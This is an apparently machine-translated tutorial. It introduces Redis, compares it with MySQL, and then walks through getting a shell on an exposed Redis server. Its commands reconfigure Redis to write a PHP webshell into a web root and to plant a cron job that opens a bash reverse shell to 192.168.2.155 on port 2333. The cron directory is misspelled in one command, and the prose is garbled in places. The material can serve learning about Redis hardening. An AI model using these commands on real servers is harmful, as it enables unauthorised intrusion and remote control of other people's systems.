What is redis
A free, open-source database Key-Value. (MySQL is a relational database)
Redis and the difference between mysql
- mysql, etc. can be queried by sql statement where the desired data, relational data types and redis are not stored, only to find the value by key, that is required to find the Key-Value want to pass through all of the key value .
- mysql stored more inclined as a table, and redis are pairs.
Other places to see put a map, will be more easily understood:
the above is a relational database, the following is Key-Value database
in general:
storing mysql data to the hard drive for persistence, powerful, but slow .
redis data more frequently used for storing into the cache, read speed is fast.
redis some routine operations
Firstly apt-get install redis-serverinstalled redis under linux, then enter the command line redis-clito enter the redis server.
redis generally port 6379.
After the installation is complete redis has its own command line, which is redis-cli, contains the commands can be found in http://redis.io/commands conduct inspection.
redis to set the key and value through the set, by using the key to get the query value.
redis how getshell
Since the files are stored in a binary redis, and may be performed to store data files and directories may be created using the change, it may be utilized for getshell.
- First come the most simple:
using the configuration dbfilename and dir redis used to write any file, and then save the file command to write to the hard disk.
config set dir /var/www/html/
config set dbfilename redis.php
set webshell "<?php phpinfo();?>"
save
FIG Effect:
2. rebound shell (ubuntu display Failed opening the RDB file root (in server root dir / var / spool / cron) for saving: Permission denied error):
config set dir /var/spool/corn/
config set dbfilename root
set x "\n* * * * * bash -i >& /dev/tcp/192.168.2.155/2333 0>&1\n"
save
- Use ssh connection, which I did not understand this too, wait until then to study:
Note the following:
- Go to the official website to download , do not use
apt-get install redis-serverthe command, do not know why, apt to install redis I can not properly save, but the official website to download it can start - After starting the official website to download the redis, need to open a new terminal using the redis-cli connection redis, but you can view information by the original terminal, results shown in Figure:
Reference article: https://www.leavesongs.com/PENETRATION/write -Via-Redis--webshell server.html
https://www.jianshu.com/p/33fd9eb90e98
